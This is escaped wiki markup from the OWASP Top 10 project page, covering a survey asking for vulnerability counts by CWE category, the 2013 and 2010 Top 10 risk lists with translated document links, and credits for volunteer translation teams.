** Airline&lt;br /&gt;
** Energy&lt;br /&gt;
** Entertainment (Games/Music/Movies)&lt;br /&gt;
** Government&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Where in the world were the application owners primarily? Again - select those where 5% or more of your results came from&lt;br /&gt;
** North America&lt;br /&gt;
** Europe&lt;br /&gt;
** AsiaPac&lt;br /&gt;
** South America&lt;br /&gt;
** Middle East&lt;br /&gt;
** Africa&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 3 of 5: Assessment Team and Detection Approach&lt;br /&gt;
&lt;br /&gt;
* What type of team did the bulk of this work? *&lt;br /&gt;
** Internal Assessment Team(s)&lt;br /&gt;
** Consulting Organization&lt;br /&gt;
** Product Vendor/Service Provider (e.g., SaaS)&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
*What type of analysis tools do they use? * Check all that apply.&lt;br /&gt;
** Free/Open Source Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Free/Open Source Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Free/Open Source Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Commercial Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Commercial Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial DAST/IAST Hybrid Analysis Tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Which analysis tools do you frequently use? This includes both free, commercial, and custom (in house) tools - List tools by name&lt;br /&gt;
&lt;br /&gt;
* What is your primary assessment methodology? * Primary being the majority of your assessments follow this approach&lt;br /&gt;
** Raw (untriaged) output of automated analysis tool results using default rules&lt;br /&gt;
** Automated analysis tool results - with manual false positive analysis/elimination&lt;br /&gt;
** Output from manually tailored automated analysis tool(s)&lt;br /&gt;
** Output from manually tailored automated analysis tool(s) - with manual false positive analysis/elimination&lt;br /&gt;
** Manual expert penetration testing (Expected to be tool assisted w/ free DAST tool(s))&lt;br /&gt;
** Manual expert penetration testing with commercial DAST tool(s)&lt;br /&gt;
** Manual expert code review (Using IDE and other free code review aids)&lt;br /&gt;
** Manual expert code review with commercial SAST tool(s)&lt;br /&gt;
** Combined manual expert code review and penetration testing with only free tools&lt;br /&gt;
** Combined manual expert code review and penetration testing with only commercial tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 4 of 5: Application Vulnerability Data&lt;br /&gt;
&lt;br /&gt;
Each question asks the number of vulnerabilities found for a particular type of vulnerability. At the end, is one catch all text question where you can add other types of vulnerabilities and their counts. If you prefer, just send your vulnerability data in a spreadsheet to brian.glas@owasp.org with these columns: CATEGORY NAME, CWE #, COUNT after you submit the rest of your input via this data call. ideally it would come from the email address you specified in the Point of Contact E-Mail question on Page 1 so its easy to correlate the two.&lt;br /&gt;
&lt;br /&gt;
* Number of SQL Injection Vulnerabilities Found (CWE-89)?&lt;br /&gt;
* Number of Hibernate Injection Vulnerabilities Found (CW-564)?&lt;br /&gt;
* Number of Command Injection Vulnerabilities Found (CWE-77)?&lt;br /&gt;
* Number of Authentication Vulnerabilities Found (CWE-287)?&lt;br /&gt;
* Number of Session Fixation Vulnerabilities Found (CWE-384)?&lt;br /&gt;
* Number of Cross-Site Scripting (XSS) Vulnerabilities Found (CWE-79)?&lt;br /&gt;
* Number of DOM-Based XSS Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Insecure Direct Object Reference Vulnerabilities Found (CWE-639)?&lt;br /&gt;
* Number of Path Traversal Vulnerabilities Found (CWE-22)?&lt;br /&gt;
* Number of Missing Authorization Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Security Misconfiguration Vulnerabilities Found (CWE-2)?&lt;br /&gt;
* Number of Cleartext Transmission of Sensitive Information Vulnerabilities Found (CWE-319)?&lt;br /&gt;
* Number of Cleartext Storage of Sensitive Information Vulnerabilities Found (CWE-312)?&lt;br /&gt;
* Number of Weak Encryption Vulnerabilities Found (CWE-326)?&lt;br /&gt;
* Number of Cryptographic Vulnerabilities Found (CWEs-310/326/327/etc)?&lt;br /&gt;
** You can report them all lumped together in 310 or in their individual categories. However you want.&lt;br /&gt;
* Number of Improper (Function Level) Access Control Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Cross-Site Request Forgery (CSRF) Vulnerabilities Found (CWE-352)?&lt;br /&gt;
* Number of Use of Known Libraries Found (No CWE)?&lt;br /&gt;
* Number of Unchecked Redirect Vulnerabilities Found (CWE-601)?&lt;br /&gt;
* Number of Unvalidated Forward Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Clickjacking Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of XML eXternal Entity Injection (XXE) Vulnerabilities Found (CWE-611)?&lt;br /&gt;
* Number of Server-Side Request Forgery (SSRF) Vulnerabilities Found (CWE-918)?&lt;br /&gt;
* Number of Denial of Service (DOS) Vulnerabilities Found (CWE-400)?&lt;br /&gt;
* Number of Expression Language Injection Vulnerabilities Found (CWE-917)?&lt;br /&gt;
* Number of Error Handling Vulnerabilities Found (CWE-388)?&lt;br /&gt;
* Number of Information Leakage/Disclosure Vulnerabilities Found (CWE-200)?&lt;br /&gt;
* Number of Insufficient Anti-automation Vulnerabilities Found (CWE-799)?&lt;br /&gt;
* Number of Insufficient Security Logging Vulnerabilities Found (CWE-778)?&lt;br /&gt;
* Number of Insufficient Intrusion Detection and Response Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Mass Assignment Vulnerabilities Found (CWE-915)?&lt;br /&gt;
* What other vulnerabilities did you find?&lt;br /&gt;
** Please provide in this format: CATEGORY NAME, CWE #, COUNT (one line per category). Say &amp;quot;No CWE&amp;quot; if there isn't a CWE # for that category. If you plan to send all your vulnerability data in via an email, please state so here so we know to expect it.&lt;br /&gt;
&lt;br /&gt;
Page 5 of 5: Suggestions for the next OWASP Top 10&lt;br /&gt;
&lt;br /&gt;
What do you think we should change?&lt;br /&gt;
&lt;br /&gt;
* Vulnerability types you think should be added to the T10? Because they are an unappreciated risk, widespread, becoming more prevalent, a new type of vulnerability, etc.&lt;br /&gt;
* Vulnerability types you think should be removed from the T10?&lt;br /&gt;
* Suggested changes to the Top 10 Document/Wiki?&lt;br /&gt;
* Suggestions on how to improve this call for data?&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2013 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On June 12, 2013 the OWASP Top 10 for 2013 was officially released. This version was updated based on numerous comments received during the comment period after the release candidate was released in Feb. 2013.&lt;br /&gt;
&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013.pdf OWASP Top 10 2013 document (PDF)].&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - Wiki.]]&lt;br /&gt;
* [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French (PDF)].&lt;br /&gt;
* [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German (PDF)]] &lt;br /&gt;
* [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korea (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian (PDF)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Presenting Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
For 2013, the OWASP Top 10 Most Critical Web Application Security Risks are:&lt;br /&gt;
&lt;br /&gt;
* [[Top_10_2013-A1-Injection | A1 Injection]]&lt;br /&gt;
* [[Top_10_2013-A2-Broken_Authentication_and_Session_Management | A2 Broken Authentication and Session Management]]&lt;br /&gt;
* [[Top_10_2013-A3-Cross-Site_Scripting_(XSS) | A3 Cross-Site Scripting (XSS)]]&lt;br /&gt;
* [[Top_10_2013-A4-Insecure_Direct_Object_References | A4 Insecure Direct Object References]]&lt;br /&gt;
* [[Top_10_2013-A5-Security_Misconfiguration | A5 Security Misconfiguration]]&lt;br /&gt;
* [[Top_10_2013-A6-Sensitive_Data_Exposure | A6 Sensitive Data Exposure]]&lt;br /&gt;
* [[Top_10_2013-A7-Missing_Function_Level_Access_Control | A7 Missing Function Level Access Control]]&lt;br /&gt;
* [[Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF) | A8 Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
* [[Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities | A9 Using Components with Known Vulnerabilities]]&lt;br /&gt;
* [[Top_10_2013-A10-Unvalidated_Redirects_and_Forwards | A10 Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
If you are interested, the methodology for how the Top 10 is produced is now documented here: [[Top_10_2013/ProjectMethodology | OWASP Top 10 Development Methodology]]&lt;br /&gt;
&lt;br /&gt;
Please help us make sure every developer in the ENTIRE WORLD knows about the OWASP Top 10 by helping to spread the word!!! &lt;br /&gt;
&lt;br /&gt;
As you help us spread the word, please emphasize: &lt;br /&gt;
&lt;br /&gt;
*OWASP is reaching out to developers, not just the application security community &lt;br /&gt;
*The Top 10 is about managing risk, not just avoiding vulnerabilities &lt;br /&gt;
*To manage these risks, organizations need an application risk management program, not just awareness training, app testing, and remediation&lt;br /&gt;
&lt;br /&gt;
We need to encourage organizations to get off the penetrate and patch mentality. As Jeff Williams said in his 2009 OWASP AppSec DC Keynote: “we’ll never hack our way secure – it’s going to take a culture change” for organizations to properly address application security.&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 and 2010 version were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages. The 2013 version was translated into even more languages.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
== Changes between 2010 and 2013 Editions ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2013 includes the following changes as compared to the 2010 edition:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management (was formerly 2010-A3)&lt;br /&gt;
* A3 Cross-Site Scripting (XSS) (was formerly 2010-A2)&lt;br /&gt;
* A4 Insecure Direct Object References&lt;br /&gt;
* A5 Security Misconfiguration (was formerly 2010-A6)&lt;br /&gt;
* A6 Sensitive Data Exposure (2010-A7 Insecure Cryptographic Storage and 2010-A9 Insufficient Transport Layer Protection were merged to form 2013-A6)&lt;br /&gt;
* A7 Missing Function Level Access Control (renamed/broadened from 2010-A8 Failure to Restrict URL Access)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF) (was formerly 2010-A5)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities (new but was part of 2010-A6 – Security Misconfiguration)&lt;br /&gt;
* A10 Unvalidated Redirects and Forwards&lt;br /&gt;
&lt;br /&gt;
== Other 2013 Top 10 Docs ==&lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP Top 10 - 2013 - Release Candidate]&lt;br /&gt;
*[https://www.owasp.org/images/3/3d/OWASP_Top_10_-_2013_Final_Release_-_Change_Log.docx OWASP Top 10 - 2013 - Final Release - Change Log (docx)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Changes-from-2010.pptx Focusing on What Changed Since 2010 (PPTX)]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP_Web_Top_10_for_2013.png]]&lt;br /&gt;
&lt;br /&gt;
== Feedback ==&lt;br /&gt;
&lt;br /&gt;
Please let us know how your organization is using the OWASP Top 10. Include your name, organization's name, and brief description of how you use the list. Thanks for supporting OWASP! &lt;br /&gt;
&lt;br /&gt;
We hope you find the information in the OWASP Top 10 useful. Please contribute back to the project by sending your comments, questions, and suggestions to topten@lists.owasp.org. Thanks! &lt;br /&gt;
&lt;br /&gt;
To join the OWASP Top 10 mailing list or view the archives, please visit the [http://lists.owasp.org/mailman/listinfo/owasp-topten subscription page.] &lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ==== Project Identification ====&lt;br /&gt;
{{Template:OWASP OWASP_Top10 Project}} --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2010 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On April 19, 2010 the final version of the OWASP Top 10 for 2010 was released, and here is the associated [[OWASPTop10-2010-PressRelease|press release]]. This version was updated based on numerous comments received during the comment period after the release candidate was released in Nov. 2009. &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 - 2010 Document] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 - 2010 - wiki]] &lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2010%20Presentation.pptx OWASP Top 10 - 2010 Presentation]&lt;br /&gt;
*[http://blip.tv/owasp-appsec-conference-in-europe/day2_track1_1430-1505-3936900 OWASP Top 10 Video of the Presentation above - this focused alot on the Top 10 for 2010 approach, rather than the details. (From OWASP AppSec EU 2010)]&lt;br /&gt;
*[http://www.vimeo.com/9006276 OWASP Top 10 Video of this Presentation when the Top 10 for 2010 was 1st released for comment - this goes through each item in the Top 10. (From OWASP AppSec DC 2009)]&lt;br /&gt;
&lt;br /&gt;
For 2010, the OWASP Top 10 Most Critical Web Application Security Risks are: &lt;br /&gt;
&lt;br /&gt;
*[[Top_10_2010-A1|A1: Injection]]&lt;br /&gt;
*[[Top_10_2010-A2|A2: Cross-Site Scripting (XSS)]]&lt;br /&gt;
*[[Top_10_2010-A3|A3: Broken Authentication and Session Management]]&lt;br /&gt;
*[[Top_10_2010-A4|A4: Insecure Direct Object References]]&lt;br /&gt;
*[[Top_10_2010-A5|A5: Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
*[[Top_10_2010-A6|A6: Security Misconfiguration]]&lt;br /&gt;
*[[Top_10_2010-A7|A7: Insecure Cryptographic Storage]]&lt;br /&gt;
*[[Top_10_2010-A8|A8: Failure to Restrict URL Access]]&lt;br /&gt;
*[[Top_10_2010-A9|A9: Insufficient Transport Layer Protection]]&lt;br /&gt;
*[[Top_10_2010-A10|A10: Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages and the 2010 version was translated into even more languages. See below for all the translated versions.&lt;br /&gt;
&lt;br /&gt;
== 2010 Versions ==&lt;br /&gt;
&lt;br /&gt;
2010 Edition: &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 2010 - PDF] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 2010 - wiki]]&lt;br /&gt;
&lt;br /&gt;
2010 Translations: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF / 这里下载PDF格式文档]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] &lt;br /&gt;
*[[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]]&lt;br /&gt;
*[https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF]&lt;br /&gt;
*[https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF]&lt;br /&gt;
*[https://www.owasp.org/images/8/86/OWASP_Top_10_-_2010_FINAL_%28spanish%29.pptx OWASP Top 10 2010 - Spanish PPT]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF]&lt;br /&gt;
&lt;br /&gt;
2010 Release Candidate: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/index.php/File:OWASP_T10_-_2010_rc1.pdf OWASP Top 10 2010 Release Candidate] &lt;br /&gt;
*[https://www.owasp.org/images/e/e1/OWASP_Top_10_RC-Public_Comments.docx OWASP Top 10 2010 Release Candidate Comments], except for one set of scanned comments [https://www.owasp.org/images/2/2e/OWASP_T10_-_2010_rc1_cmts_Kai_Jendrian.pdf which are here].&lt;br /&gt;
&lt;br /&gt;
Previous versions: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf OWASP Top 10 2007 - PDF] &lt;br /&gt;
*[[Top 10 2007|OWASP Top 10 2007 - wiki]] &lt;br /&gt;
*[https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=Project_Details OWASP Top 10 2007 - PDF Translations are here] &lt;br /&gt;
*[[Top 10 2004|OWASP Top 10 2004 - wiki]]&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
= Translation Efforts =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The 2017 RC1 has been rejected. There will be an RC2 coming out shortly. As RC2 may have significant changes from RC1, we suggest that you wait for RC2 before continuing your translation efforts. &lt;br /&gt;
&lt;br /&gt;
If you are interested in helping, please contact the members of the team for the language you are interested in contributing to, or if you don't see your language listed, please email owasp-topten@lists.owasp.org to let us know that you want to help and we'll form a volunteer group for your language.&lt;br /&gt;
&lt;br /&gt;
Here is the original source document for the [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pptx OWASP Top 10 - 2017 '''Release Candidate''' which is in PowerPoint].  &lt;br /&gt;
&lt;br /&gt;
2017 Release Candidate Translation Teams:&lt;br /&gt;
&lt;br /&gt;
* French: Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org. &lt;br /&gt;
* Chinese: 王颉、包悦忠、Rip、顾凌志、王厚奎、王文君、吴楠、夏天泽、夏玉明、杨天识、袁明坤、张镇(排名不分先后，按姓氏拼音排列)  [https://www.owasp.org/images/8/8f/OWASP_Top_10_2017（RC1）中文版（V1.0）.pdf OWASP Top10 2017 RC1 - Chinese PDF]&lt;br /&gt;
* Azerbaijanian: Rashad Aliyev (rashad@aliev.info)&lt;br /&gt;
* Others to be listed.&lt;br /&gt;
&lt;br /&gt;
2013 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
* Arabic: [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic PDF]  Translated by: Mohannad Shahat: Mohannad.Shahat@owasp.org, Fahad: @SecurityArk, Abdulellah Alsaheel: cs.saheel@gmail.com, Khalifa Alshamsi: Khs1618@gmail.com and Sabri(KING SABRI): king.sabri@gmail.com, Mohammed Aldossary: mohammed.aldossary@owasp.org&lt;br /&gt;
* Chinese 2013：中文版2013 [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)]. 项目组长： Rip 王颉， 参与人员： 陈亮、 顾庆林、 胡晓斌、 李建蒙、 王文君、 杨天识、 张在峰&lt;br /&gt;
* Czech 2013: [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)] [https://www.owasp.org/images/0/02/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pptx OWASP Top 10 2013 - Czech (PPTX)] CSIRT.CZ - CZ.NIC, z.s.p.o. (.cz domain registry): Petr Zavodsky: petr.zavodsky@owasp.org, Vaclav Klimes, Zuzana Duracinska, Michal Prokop, Edvard Rejthar, Pavel Basta&lt;br /&gt;
*French 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French PDF] Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org, Erwan Abgrall: g4l4drim@gmail.com, Benjamin Avet: benjamin.avet@gmail.com, Jocelyn Aubert: jocelyn.aubert@owasp.org, Damien Azambour: damien.azambourg@owasp.org, Aline Barthelemy: aline.barthelemy@fr.abb.com, Moulay Abdsamad Belghiti: abdsamad.belghiti@gmail.com, Gregory Blanc: gregory.blanc@gmail.com, Clément Capel: clement.capel@sfr.com, Etienne Capgras: Etienne.capgras@solucom.fr, Julien Cayssol: julien@aqwz.com, Antonio Fontes: antonio.fontes@owasp.org, Ely de Travieso: Ely.detravieso@owasp.org, Nicolas Grégoire: nicolas.gregoire@agarri.fr, Valérie Lasserre: valerie.lasserre@gmx.fr, Antoine Laureau: antoine.laureau@owasp.org, Guillaume Lopes: lopes.guillaume@free.fr, Gilles Morain: gilles.morain@gmail.com, Christophe Pekar: christophe.pekar@owasp.org, Olivier Perret: perrets@free.fr, Michel Prunet: michel.prunet@owasp.org, Olivier Revollat: revollat@gmail.com, Aymeric Tabourin: aymeric.tabourin@orange.com&lt;br /&gt;
* German 2013: [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Torsten Gigler, Tobias Glemser, Dr. Ingo Hanke, Thomas Herzog, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
* Hebrew 2013: [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf PDF] Translated by: Or Katz, Eyal Estrin, Oran Yitzhak, Dan Peled, Shay Sivan.&lt;br /&gt;
* Italian 2013: [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian PDF] Translated by: Michele Saporito: m.saporito7@gmail.com, Paolo Perego: thesp0nge@owasp.org, Matteo Meucci: matteo.meucci@owasp.org, Sara Gallo: sara.gallo@gmail.com, Alessandro Guido: alex@securityaddicted.com, Mirko Guido Spezie: mirko@dayu.it, Giuseppe Di Cesare: giuseppe.dicesare@alice.it, Paco Schiaffella: schiaffella@gmail.com, Gianluca Grasso: giandou@gmail.com, Alessio D'Ospina: alessiodos@gmail.com, Loredana Mancini: loredana.mancini@business-e.it, Alessio Petracca: alessio.petracca@gmail.com, Giuseppe Trotta: giutrotta@gmail.com, Simone Onofri: simone.onofri@gmail.com, Francesco Cossu: hambucker@gmail.com, Marco Lancini: marco.lancini.ml@gmail.com, Stefano Zanero: zanero@elet.polimi.it, Giovanni Schmid: giovanni.schmid@na.icar.cnr.it, Igor Falcomata': koba@sikurezza.org&lt;br /&gt;
*Japanese 2013: [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese PDF] Translated by: Chia-Lung Hsieh: ryusuke.tw(at)gmail.com, Reviewed by: Hiroshi Tokumaru, Takanori Nakanowatari&lt;br /&gt;
* Korean 2013: [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korean PDF] (이름가나다순) 김병효:byounghyo.kim@owasp.org, 김지원:jiwon.kim@owasp.or.kr, 김효근:katuri@katuri.kr, 박정훈:xelion@gmail.com, 성영모:youngmo.seong@owasp.or.kr, 성윤기:yune.sung@owasp.org, 송보영:boyoung.song@owasp.or.kr, 송창기:factor7@naver.com, 유정호:griphis77@gmail.com, 장상민:sangmin.jang@owasp.or.kr, 전영재:youngjae.jeon@owasp.org, 정가람:tgcarrot@gmail.com, 정홍순:jhs728@gmail.com, 조민재:johnny.cho@owasp.org,허성무:issimplenet@gmail.com&lt;br /&gt;
*Brazilian Portuguese 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese PDF] Translated by: Carlos Serrão, Marcio Machry, Ícaro Evangelista de Torres, Carlo Marcelo Revoredo da Silva, Luiz Vieira, Suely Ramalho de Mello, Jorge Olímpia, Daniel Quintão, Mauro Risonho de Paula Assumpção, Marcelo Lopes, Caio Dias, Rodrigo Gularte&lt;br /&gt;
